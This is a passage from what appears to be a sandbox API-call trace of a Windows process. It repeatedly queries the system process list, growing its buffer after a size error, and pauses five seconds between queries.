returned 0x0 [0263.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.631] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.638] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.644] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.651] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.658] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.666] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.673] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.680] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.686] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.693] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.699] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.705] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.712] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.718] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.725] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.731] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.737] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.743] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.749] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.755] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.762] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 